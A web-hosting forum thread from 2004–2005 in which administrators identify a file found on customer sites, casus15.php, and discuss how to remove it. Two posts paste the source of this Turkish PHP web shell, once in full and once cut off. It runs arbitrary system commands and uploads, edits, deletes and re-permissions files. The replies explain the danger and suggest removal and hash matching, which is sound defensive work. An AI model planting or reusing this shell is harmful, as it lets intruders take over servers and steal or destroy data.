Results 1 to 16 of 16
Thread: casus15.php is it a trojan ???
-
11-15-2004, 09:10 PM #1Junior Guru Wannabe
- Join Date
- Sep 2004
- Posts
- 55
casus15.php is it a trojan ???
Just received an email from a customer that he found a trojan on his website called casus15.php
I have never heared of such trojan before, I believe that it is wiki file!
Can someone here help us please?
Is it a trojan? and if so what is the safest way to find it and remove it?
The customer sent to me the file, so I will have it if required.
cheers
-
11-15-2004, 09:28 PM #2Disabled
- Join Date
- Aug 2004
- Location
- USA
- Posts
- 19
if you mean a trojan to your server, id highly doubt a PHP script could be a backdoor trojan... or have the access! BUT! to be on the safe side, you should look at the source.... see what it does. Then make your own judgement from it.
-
11-15-2004, 09:40 PM #3Aspiring Evangelist
- Join Date
- Apr 2004
- Location
- Australia
- Posts
- 419
Check what its looking it up, also chmod it correctly (not 777)
-
11-15-2004, 09:52 PM #4Disabled
- Join Date
- Aug 2004
- Location
- USA
- Posts
- 19
the chmod permission isant the only permissioning it would need... for a trojan it would need some access, to suexec or somthing with power, and it would be in a socket maybe, just some quick assumsitions.
-
11-15-2004, 11:13 PM #5Junior Guru Wannabe
- Join Date
- Sep 2004
- Posts
- 55
Well it looks pretty ugly!
I think we will need a Turk expert here,
I will paste it her and let the experts tell us what it does:
<?php
$default=$DOCUMENT_ROOT;
$this_file="./casus15.php";
if(isset($save)){
$fname=str_replace(" ","_",$fname);
$fname=str_replace("%20","_",$fname);
header("Cache-control: private");
header("Content-type: application/force-download");
header("Content-Length: ".filesize($save));
header("Content-Disposition: attachment; filename=$fname");
$fp = fopen($save, 'r');
fpassthru($fp);
fclose($fp);
unset($save);
exit;
}
if ( function_exists('ini_get') ) {
$onoff = ini_get('register_globals');
} else {
$onoff = get_cfg_var('register_globals');
}
if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
function deltree($deldir) {
$mydir=@dir($deldir);
while($file=$mydir->read()) {
if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
@chmod("$deldir/$file",0777);
deltree("$deldir/$file");
}
if (is_file("$deldir/$file")) {
@chmod("$deldir/$file",0777);
@unlink("$deldir/$file");
}
}
$mydir->close();
@chmod("$deldir",0777);
echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SİLİNDİ:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
}
if ($op=='phpinfo'){
$fonk_kap = get_cfg_var("fonksiyonları_kapat");
echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu Çalışmıyiii</center>";
exit;
}
if ($op=='me'){
echo "<html>
<head>
<title>CEHENNEMDEN ÇIKAN ÇILGIN TÜRK</title>
</head>
<body bgcolor='#000000' text='#0000FF' link='#0000FF' vlink='#0000FF' alink='#00FF00'>
<center>Fazla söze gerek yok...</center>
<center><br>O yanlız bir kovboy,<br>
<br>O cehennemden çıkan çılgın TÜRK,<br>
<br>O bir rap manyağı,<br>
<br>O bir php coder,<br>
<br>O'nun hackten daha çok sevdiği tek şey iki hack,<br>
<br>O...<br>
<br>O'nun kim olduunu biliyorsunuz O tabiki...<br>
<br></center>";
$sayi='7';
while($sayi>=1){
echo "<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'> EFENDISI</font> <font color='#FF0000'>MAFIABOY</font> </font></center>";
$sayi--;
}
$sayi2='1';
while($sayi2<=7){
echo "<center><font size='$sayi2' color='#008000'>baddog@hotmail.com</font></center>";
$sayi2++;
};
echo "</body>
</html>";
exit;
}
echo "<html>
<head>
<title>CasuS 1.5 by MafiABoY</title>
</head>
<body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
</body>";
echo "<center><font size='+3' color='#FF0000'><b> CasuS 1.5!!! Powered by MafiABoY</b></font></center><br>
<center><font size='+2' color='#FFFFFF'>A TURKISH </font><font size='+2' color='#FF0000'>HACKER</font><br>
<br>";
echo "<center><a href='./$this_file?dir=$dir'>ANA BOLUM</a></center>";
echo "<br>";
echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
echo "<br>";
echo "<center><a href='./$this_file?op=wshell&dir=$dir'>WEB SHELL</a></center>";
echo "<br>
<br>
<br>";
echo "<center>---><a href='./$this_file?op=me' target='_blank'>MafiABoY</a><---</center>";
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<div align=center>
<font size='+1' color='#0000FF'><u>Root Klasör</u>: $DOCUMENT_ROOT</font><br>
<font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";
if(!isset($dir)){
$dir="$default";
}
echo "<input type=text size=60 name=dir value='$dir'>
<input type=submit value='GIT'><br>
</form>
</div>";
if ($op=='wshell'){
echo "<br><center><font size='+1' color='#FF0000'>WEBSHELL</font></center>";
if (isset($ok)){
if (empty($kod)){
die ("<center><font color='#FF0000'>LEN MANYAK KOMUT YAZMAZSAN NE MOK İŞİNE YARAR</font><center>");
}
echo "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
<br>";
echo "<center><input type=text size=35 name=kod value='$kod'><input type=submit name=ok value='CALISTIR'>
<br>
<br></center></form>";
echo "<center><TEXTAREA rows=30 cols=85 readonly>";
system("$kod");
echo "</TEXTAREA></center>";
exit;
} elseif (empty($ok)){
echo "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
<br>";
echo "<center><input type=text size=35 name=kod value='Calistirmak istediginiz komutu buraya girin'><input type=submit name=ok value='CALISTIR'>
<br>
<br></center></form>";
echo "<center><TEXTAREA rows=30 cols=85></TEXTAREA></center>";
exit;
}
}
if ($op=='up'){
$path=dir;
echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
if(isset($dy)) {
if(empty($dosya_gonder)){
} else {
copy ( $dosya_gonder, "$dir/$dosya_gonder_name") ? print("$dosya_gonder_name <font color='#0000FF'>kopyalandı</font><br>") : print("$dosya_gonder_name <font color='#FF0000'>kopyalanamadı</font><br>");
}
if(empty($dosya_gonder2)){
} else {
copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_name <font color='#0000FF'>kopyaland</font>ı<br>") : print("$dosya_gonder2_name <font color='#FF0000'>kopyalanamadı</font><br>");
}
if(empty($dosya_gonder3)){
} else {
copy ( $dosya_gonder3, "$dir/$dosya_gonder3_name") ? print("$dosya_gonder3_name <font color='#0000FF'>kopyalandı</font><br>") : print("$dosya_gonder3_name <font color='#FF0000'>kopyalanamadı</font><br>");
}
if(empty($dosya_gonder4)){
} else {
copy ( $dosya_gonder4, "$dir/$dosya_gonder4_name") ? print("$dosya_gonder4_name <font color='#0000FF'>kopyalandı</font><br>") : print("$dosya_gonder4_name <font color='#FF0000'>kopyalanamadı</font><br>");
}
} elseif(empty($dy )) {
$path=$dir;
$dir = $dosya_dizin;
echo "$dir";
echo "<FORM ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
echo "<center><INPUT TYPE='file' NAME='dosya_gonder2'></center><br>";
echo "<center><INPUT TYPE='file' NAME='dosya_gonder3'></center><br>";
echo "<center><INPUT TYPE='file' NAME='dosya_gonder4'></center><br>";
echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
echo "</form>";
echo "</html>";
}
}
if($op=='mf'){
$path=$dir;
if(isset($dismi) && isset($kodlar)){
$ydosya="$path/$dismi";
if(file_exists("$path/$dismi")){
$dos= "Böyle Bir Dosya Vardı Üzerine Yazıldı";
} else {
$dos = "Dosya Oluşturuldu";
}
touch ("$path/$dismi") or die("Dosya Oluşturulamıyor");
$ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak için açılamıyor");
fwrite($ydosya2, $kodlar) or die("Dosyaya yazılamıyor");
fclose($ydosya2);
echo "<center><font color='#0000FF'>$dos</font></center>";
} else {
echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
echo "<center>Dosya İsmi :<input type='text' name='dismi'></center><br>";
echo "<br>";
echo "<center>KODLAR</center><br>";
echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
echo "</form>";
}
}
if($op=='md'){
$path=$dir;
if(isset($kismi) && isset($okmf)){
$klasör="$path/$kismi";
mkdir("$klasör", 0777) or die ("<center><font color='#0000FF'>Klasör Oluşturulamıyor</font></center>");
echo "<center><font color='#0000FF'>Klasör Oluşturuldu</font></center>";
}
echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
echo "<center>Klasör İsmi :<input type='text' name='kismi'></center><br>";
echo "<br>";
echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
echo "</form>";
}
if($op=='del'){
unlink("$fname");
}
if($op=='dd'){
$dir=$here;
$deldirs=$yol;
if(!file_exists("$deldirs")) {
echo "<font color=\"#ff0000\">Dosya Yok</font>";
} else {
deltree($deldirs);
}
}
if($op=='edit'){
$yol=$fname;
$yold=$path;
if (isset($ok)){
$dosya = fopen("$yol", 'w') or die("Dosya Açılamıyor");
$metin=$tarea;
fwrite($dosya, $metin) or die("Yazılamıyor!");
fclose($dosya);
echo "<center><font color='#0000FF'Dosya Başarıyla Düzenlendi</font></center>";
} else {
$path=$dir;
echo "<center>DÜZENLE: $yol</center>";
$dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya Açılamıyor</font></center>");
$boyut=filesize($yol);
$duzen = @fread ($dosya, $boyut);
echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
fclose($dosya);
$duzen=htmlspecialchars($duzen);
echo "</form>";
}
}
if($op=='efp2'){
$fileperm=base_convert($_POST['fileperm'],8,10);
echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 İSİMLİ DOSYANIN</font></b>" : "<font color=\"#ff0000\">DEİŞTİRİLEMEDİ!!</font>";
echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEİŞTİRİLDİ</font>";
}
if($op=='efp'){
$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
echo "<form method=post action=./$this_file?op=efp2>
<div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
<input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
<input name='dir' type='hidden' value='$yol'>
<input type='submit' value='TAMAM' class='input'></div><br>
</form>";
}
$path=$dir;
if(isset($dir)){
if ($dir = @opendir("$dir")) {
while (($file = readdir($dir)) !== false) {
if($file!="." && $file!=".."){
if(is_file("$path/$file")){
$disk_space=filesize("$path/$file");
$kb=$disk_space/1024;
$total_kb = number_format($kb, 2, '.', '');
$total_kb2="Kb";
echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>düzenle</a> - ";
echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
@$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
echo "<br></div>\n";
}else{
echo "<div align=left><a href='./$this_file?dir=$path/$file'>GİT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
$dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
echo "<font color='#FFFF00'>$dirperm</font>";
echo " <br></div>\n";
}
}
}
closedir($dir);
}
}
echo "<center>------------------------------</center>";
echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klasörüne Git</a></center>";
echo "<center><a href='./$this_file?dir=/'>Linux Kök Dizinine Git</a></center>";
if(file_exists("B:\\")){
echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
} else {}
if(file_exists("C:\\")){
echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
} else {}
if (file_exists("D:\\")){
echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
} else {}
if (file_exists("E:\\")){
echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
} else {}
if (file_exists("F:\\")){
echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
} else {}
if (file_exists("G:\\")){
echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
} else {}
if (file_exists("H:\\")){
echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
} else {}
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<center><font size='+1' color='#FF0000'><b>SERVER BİLGİLERİ</b></font><br></center>";
echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
echo "<br>";
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<center><font size='+1' color='#FF0000'><b>İŞLEMLER</b></font><br></center>";
echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya Gönder</a></font></center>";
echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Oluştur</a></font></center>";
echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klasör Oluştur</a></font></center>";
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<br>
<center>Tüm hakları sahibi MafiABoY'a aittir</center>";
?>
-
11-15-2004, 11:18 PM #6Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
Its not a trojan. Its a script that was created to excute system commands on your server using the system() function. This is not a good thing, the attack could do
system(cat /home/user/public_html/config.php);
for example, if your server is not properly secured.Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
11-15-2004, 11:28 PM #7Junior Guru Wannabe
- Join Date
- Sep 2004
- Posts
- 55
Originally posted by thelinuxguy
Its not a trojan. Its a script that was created to excute system commands on your server using the system() function. This is not a good thing, the attack could do
system(cat /home/user/public_html/config.php);
for example, if your server is not properly secured.
This script was found by one of my customers on his websites.
What can I do to locate any other copies and destroy them and what is the safest way??
Thank you very much in advance.
-
11-16-2004, 01:26 AM #8Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
guessing you have linux/freebsd just rm -f the files. They are just php files.
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
11-16-2004, 04:24 AM #9Web Hosting Master
- Join Date
- Jan 2004
- Location
- /home/dislexik
- Posts
- 823
Try this command:
find /home -name casus15.php -print0 | xargs -0 rm -rf
That will search /home for all files by the name of casus15.php and pass it through rm -rf (Removes it)
DislexiK"You don’t learn to hack, you hack to learn"
-
11-16-2004, 08:21 AM #10Web Hosting Master
- Join Date
- Mar 2004
- Location
- Los Angeles
- Posts
- 622
Some words translated into English in this file:
Lords of the Hackers
Server Information
Go to Root Folder
Change the permissions of the file
etc.
Goes like this.
-
11-16-2004, 08:36 AM #11Retired Moderator
- Join Date
- Sep 2004
- Location
- Flint, Michigan
- Posts
- 5,766
What language is that in? And what is the user running on his site that would allow somebody else to place the file and execute it? php-nuke or something?
-
11-16-2004, 08:50 AM #12Web Hosting Master
- Join Date
- Jan 2004
- Location
- /home/dislexik
- Posts
- 823
justadollarhostin,
The extension seems to show it is a php file, therefore I am guessing - but only guessing ... that it is PHP
DislexiK"You don’t learn to hack, you hack to learn"
-
11-16-2004, 08:53 AM #13Retired Moderator
- Join Date
- Sep 2004
- Location
- Flint, Michigan
- Posts
- 5,766
Originally posted by DislexiK
justadollarhostin,
The extension seems to show it is a php file, therefore I am guessing - but only guessing ... that it is PHP
DislexiK
But having read the source of the PHP file, i was curious as to the language used in it:
<center><br>O yanlız bir kovboy,<br>
<br>O cehennemden çıkan çılgın TÜRK,<br>
<br>O bir rap manyağı,<br>
<br>O bir php coder,<br>
<br>O'nun hackten daha çok sevdiği tek şey iki hack,<br>
<br>O...<br>
<br>O'nun kim olduunu biliyorsunuz O tabiki...<br>
-
11-16-2004, 10:18 AM #14Web Hosting Master
- Join Date
- Jul 2003
- Location
- Kuwait
- Posts
- 5,104
If you have safemode and proper permissions on your servers, this script can't do much -- other than take up space....which rm can fix.
As easy way to find out if this script exists on your server -- take a md5 hash of it, then write a script that can compare the md5 hashes of other php files and compare it. If the hash matches, the file is there (even if it has a different name).
Would take a lot of server crunch time -- but if you have a spare box, you could wget the files and then have the check running on the spare box.
If you just check for the filename, then if the same code exists with a different filename, the vulnerability will still be there.
-
11-16-2004, 03:53 PM #15Web Hosting Master
- Join Date
- Jul 2004
- Location
- Texas
- Posts
- 688
Originally posted by justadollarhostin
What language is that in? And what is the user running on his site that would allow somebody else to place the file and execute it? php-nuke or something?
-
05-25-2005, 06:59 PM #16Newbie
- Join Date
- Apr 2004
- Location
- Phx, AZ, USA
- Posts
- 12
I know this is an old post, but we just found one of these files on our Windows 2003 Server. We are using a Unique IUSR for each domain, but considering it works at system level, that would be nothing.
Any way to block this from working?
PHP Code:<?php
$default=$DOCUMENT_ROOT;
$this_file=\"./casus15.php\";
if(isset($save)){
$fname=str_replace(\" \",\"_\",$fname);
$fname=str_replace(\"%20\",\"_\",$fname);
header(\"Cache-control: private\");
header(\"Content-type: application/force-download\");
header(\"Content-Length: \".filesize($save));
header(\"Content-Disposition: attachment; filename=$fname\");
$fp = fopen($save, \'r\');
fpassthru($fp);
fclose($fp);
unset($save);
exit;
}
if ( function_exists(\'ini_get\') ) {
$onoff = ini_get(\'register_globals\');
} else {
$onoff = get_cfg_var(\'register_globals\');
}
if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
function deltree($deldir) {
$mydir=@dir($deldir);
while($file=$mydir->read()) {
if((is_dir(\"$deldir/$file\")) AND ($file!=\".\") AND ($file!=\"..\")) {
@chmod(\"$deldir/$file\",0777);
deltree(\"$deldir/$file\");
}
if (is_file(\"$deldir/$file\")) {
@chmod(\"$deldir/$file\",0777);
@unlink(\"$deldir/$file\");
}
}
$mydir->close();
@chmod(\"$deldir\",0777);
echo @rmdir($deldir) ? \"<center><b><font color=\'#0000FF\'>SİLİNDİ:$deldir/$file</b></font></center>\" : \"<center><font color=\\\"#ff0000\\\">Silinemedi:$deldir/$file</font></center>\";
}
if ($op==\'phpinfo\'){
$fonk_kap = get_cfg_var(\"fonksiyonları_kapat\");
echo $phpinfo=(!eregi(\"phpinfo\",$fonk_kapat)) ? phpinfo() : \"<center>phpinfo() Komutu Çalışmıyiii</center>\";
exit;
}
if ($op==\'me\'){
echo \"<html>
<head>
<title>CEHENNEMDEN ÇIKAN ÇILGIN TÜRK</title>
</head>
<body bgcolor=\'#000000\' text=\'#0000FF\' link=\'#0000FF\' vlink=\'#0000FF\' alink=\'#00FF00\'>
<center>Fazla söze gerek yok...</center>
<center><br>O yanlız bir kovboy,<br>
<br>O cehennemden çıkan çılgın TÜRK,<br>
<br>O bir rap manyağı,<br>
<br>O bir php coder,<br>
<br>O\'nun hackten daha çok sevdiği tek şey iki hack,<br>
<br>O...<br>
<br>O\'nun kim olduunu biliyorsunuz O tabiki...<br>
<br></center>\";
$sayi=\'7\';
while($sayi>=1){
echo \"<center><font size=\'$sayi\' color=\'#FFFFFF\'>HACKLERIN<font color=\'#008000\'> EFENDISI</font> <font color=\'#FF0000\'>MAFIABOY</font> </font></center>\";
$sayi--;
}
$sayi2=\'1\';
while($sayi2<=7){
echo \"<center><font size=\'$sayi2\' color=\'#008000\'>baddog@hotmail.com</font></center>\";
$sayi2++;
};
echo \"</body>
</html>\";
exit;
}
echo \"<html>
<head>
<title>CasuS 1.5 by MafiABoY</title>
</head>
<body bgcolor=\'#000000\' text=\'#008000\' link=\'#00FF00\' vlink=\'#00FF00\' alink=\'#00FF00\'>
</body>\";
echo \"<center><font size=\'+3\' color=\'#FF0000\'><b> CasuS 1.5!!! Powered by MafiABoY</b></font></center><br>
<center><font size=\'+2\' color=\'#FFFFFF\'>A TURKISH </font><font size=\'+2\' color=\'#FF0000\'>HACKER</font><br>
<br>\";
echo \"<center><a href=\'./$this_file?dir=$dir\'>ANA BOLUM</a></center>\";
echo \"<br>\";
echo \"<center><a href=\'./$this_file?op=phpinfo\' target=\'_blank\'>PHP INFO</a></center>\";
echo \"<br>\";
echo \"<center><a href=\'./$this_file?op=wshell&dir=$dir\'>WEB SHELL</a></center>\";
echo \"<br>
<br>
<br>\";
echo \"<center>---><a href=\'./$this_file?op=me\' target=\'_blank\'>MafiABoY</a><---</center>\";
echo \"--------------------------------------------------------------------------------------------------------------------------------------------------------------------\";
echo \"<div align=center>
<font size=\'+1\' color=\'#0000FF\'><u>Root Klasör</u>: $DOCUMENT_ROOT</font><br>
<font size=\'+1\'color=\'#0000FF\'><u>CasuS 1.5\'in URL\'si</u>: [url]http://[/url]$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>\";
if(!isset($dir)){
$dir=\"$default\";
}
echo \"<input type=text size=60 name=dir value=\'$dir\'>
<input type=submit value=\'GIT\'><br>
</form>
</div>\";
if ($op==\'wshell\'){
echo \"<br><center><font size=\'+1\' color=\'#FF0000\'>WEBSHELL</font></center>\";
if (isset($ok)){
if (empty($kod)){
die (\"<center><font color=\'#FF0000\'>LEN MANYAK KOMUT YAZMAZSAN NE MOK İŞİNE YARAR</font><center>\");
}
echo \"<form method=\'Post\' action=\'./$this_file?op=wshell&dir=$dir\'>
<br>\";
echo \"<center><input type=text size=35 name=kod value=\'$kod\'><input type=submit name=ok value=\'CALISTIR\'>
<br>
<br></center></form>\";
echo \"<center><TEXTAREA rows=30 cols=85 readonly>\";
system(\"$kod\");
echo \"</TEXTAREA></center>\";
exit;
} elseif (empty($ok)){
echo \"<form method=\'Post\' action=\'./$this_file?op=wshell&dir=$dir\'>
<br>\";
echo \"<center><input type=text size=35 name=kod value=\'Calistirmak istediginiz komutu buraya girin\'><input type=submit name=ok value=\'CALISTIR\'>
<br>
<br></center></form>\";
echo \"<center><TEXTAREA rows=30 cols=85></TEXTAREA></center>\";
exit;
}
}
if ($op==\'up\'){
$path=dir;
echo \"<br><br><center><font size=\'+1\' color=\'#FF0000\'><b>DOSYA GONDERME</b></font></center><br>\";
if(isset($dy)) {
if(empty($dosya_gonder)){
} else {
copy ( $dosya_gonder, \"$dir/$dosya_gonder_name\") ? print(\"$dosya_gonder_name <font color=\'#0000FF\'>kopyalandı</font><br>\") : print(\"$dosya_gonder_name <font color=\'#FF0000\'>kopyalanamadı</font><br>\");
}
if(empty($dosya_gonder2)){
} else {
copy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_name <font color=\'#0000FF\'>kopyaland</font>ı<br>\") : print(\"$dosya_gonder2_name <font color=\'#FF0000\'>kopyalanamadı</font><br>\");
}
if(empty($dosya_gonder3)){
} else {
copy ( $dosya_gonder3, \"$dir/$dosya_gonder3_name\") ? print(\"$dosya_gonder3_name <font color=\'#0000FF\'>kopyalandı</font><br>\") : print(\"$dosya_gonder3_name <font color=\'#FF0000\'>kopyalanamadı</font><br>\");
}
if(empty($dosya_gonder4)){
} else {
copy ( $dosya_gonder4, \"$dir/$dosya_gonder4_name\") ? print(\"$dosya_gonder4_name <font color=\'#0000FF\'>kopyalandı</font><br>\") : print(\"$dosya_gonder4_name <font color=\'#FF0000\'>kopyalanamadı</font><br>\");
}
} elseif(empty($dy )) {
$path=$dir;
$dir = $dosya_dizin;
echo \"$dir\";
echo \"<FORM ENCTYPE=\'multipart/form-data\' ACTION=\'$this_file?op=up&dir=$path\' METHOD=\'POST\'>\";
echo \"<center><INPUT TYPE=\'file\' NAME=\'dosya_gonder\'></center><br>\";
echo \"<center><INPUT TYPE=\'file\' NAME=\'dosya_gonder2\'></center><br>\";
echo \"<center><INPUT TYPE=\'file\' NAME=\'dosya_gonder3\'></center><br>\";
echo \"<center><INPUT TYPE=\'file\' NAME=\'dosya_gonder4\'></center><br>\";
echo \"<br><center><INPUT TYPE=\'SUBMIT\' NAME=\'dy\' VALUE=\'Dosya Yolla!\'></center>\";
echo \"</form>\";
echo \"</html>\";
}
}
if($op==\'mf\'){
$path=$dir;
if(isset($dismi) && isset($kodlar)){
$ydosya=\"$path/$dismi\";
if(file_exists(\"$path/$dismi\")){
$dos= \"Böyle Bir Dosya Vardı Üzerine Yazıldı\";
} else {
$dos = \"Dosya Oluşturuldu\";
}
touch (\"$path/$dismi\") or die(\"Dosya Oluşturulamıyor\");
$ydosya2 = fopen(\"$ydosya\", \'w\') or die(\"Dosya yazmak için açılamıyor\");
fwrite($ydosya2, $kodlar) or die(\"Dosyaya yazılamıyor\");
fclose($ydosya2);
echo \"<center><font color=\'#0000FF\'>$dos</font></center>\";
} else {
echo \"<FORM METHOD=\'POST\' ACTION=\'$this_file?op=mf&dir=$path\'>\";
echo \"<center>Dosya İsmi :<input type=\'text\' name=\'dismi\'></center><br>\";
echo \"<br>\";
echo \"<center>KODLAR</center><br>\";
echo \"<center><TEXTAREA NAME=\'kodlar\' ROWS=\'19\' COLS=\'52\'></TEXTAREA></center>\";
echo \"<center><INPUT TYPE=\'submit\' name=\'okmf\' value=\'TAMAM\'></center>\";
echo \"</form>\";
}
}
if($op==\'md\'){
$path=$dir;
if(isset($kismi) && isset($okmf)){
$klasör=\"$path/$kismi\";
mkdir(\"$klasör\", 0777) or die (\"<center><font color=\'#0000FF\'>Klasör Oluşturulamıyor</font></center>\");
echo \"<center><font color=\'#0000FF\'>Klasör Oluşturuldu</font></center>\";
}
echo \"<FORM METHOD=\'POST\' ACTION=\'$this_file?op=md&dir=$path\'>\";
echo \"<center>Klasör İsmi :<input type=\'text\' name=\'kismi\'></center><br>\";
echo \"<br>\";
echo \"<center><INPUT TYPE=\'submit\' name=\'okmf\' value=\'TAMAM\'></center>\";
echo \"</form>\";
}
if($op==\'del\'){
unlink(\"$fname\");
}
if($op==\'dd\'){
$dir=$here;
$deldirs=$yol;
if(!file_exists(\"$deldirs\")) {
echo \"<font color=\\\"#ff0000\\\">Dosya Yok</font>\";
} else {
deltree($deldirs);
}
}
if($op==\'edit\'){
$yol=$fname;
$yold=$path;
if (isset($ok)){
$dosya = fopen(\"$yol\", \'w\') or die(\"Dosya Açılamıyor\");
$metin=$tarea;
fwrite($dosya, $metin) or die(\"Yazılamıyor!\");
fclose($dosya);
echo \"<center><font color=\'#0000FF\'Dosya Başarıyla Düzenlendi</font></center>\";
} else {
$path=$dir;
echo \"<center>DÜZENLE: $yol</center>\";
$dosya = fopen(\"$yol\", \'r\') or die(\"<center><font color=\'#FF0000\'Dosya Açılamıyor</font></center>\");
$boyut=filesize($yol);
$duzen = @fread ($dosya, $boyut);
echo \"<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>\";
echo \"<center><TEXTAREA style=\'WIDTH: 476px; HEIGHT: 383px\' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>\";
echo \"<center><input type=\'Submit\' value=\'TAMAM\' name=\'ok\'></center>\";
fclose($dosya);
$duzen=htmlspecialchars($duzen);
echo \"</form>\";
}
}
if($op==\'efp2\'){
$fileperm=base_convert($_POST[\'fileperm\'],8,10);
echo $msg=@chmod($dir.\"/\".$dismi2,$fileperm) ? \"<font color=\'#0000FF\'><b>$dismi2 İSİMLİ DOSYANIN</font></b>\" : \"<font color=\\\"#ff0000\\\">DEİŞTİRİLEMEDİ!!</font>\";
echo \" <font color=\'#0000FF\'>CHMODU \".substr(base_convert(@fileperms($dir.\"/\".$dismi2),10,8),-4).\" OLARAK DEİŞTİRİLDİ</font>\";
}
if($op==\'efp\'){
$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
echo \"<form method=post action=./$this_file?op=efp2>
<div align=center><input name=\'dismi2\' type=\'text\' value=\'$dismi\' class=\'input\' readonly>CHMOD:
<input type=\'text\' name=\'fileperm\' size=\'20\' value=\'$izinler2\' class=\'input\'>
<input name=\'dir\' type=\'hidden\' value=\'$yol\'>
<input type=\'submit\' value=\'TAMAM\' class=\'input\'></div><br>
</form>\";
}
$path=$dir;
if(isset($dir)){
if ($dir = @opendir(\"$dir\")) {
while (($file = readdir($dir)) !== false) {
if($file!=\".\" && $file!=\"..\"){
if(is_file(\"$path/$file\")){
$disk_space=filesize(\"$path/$file\");
$kb=$disk_space/1024;
$total_kb = number_format($kb, 2, \'.\', \'\');
$total_kb2=\"Kb\";
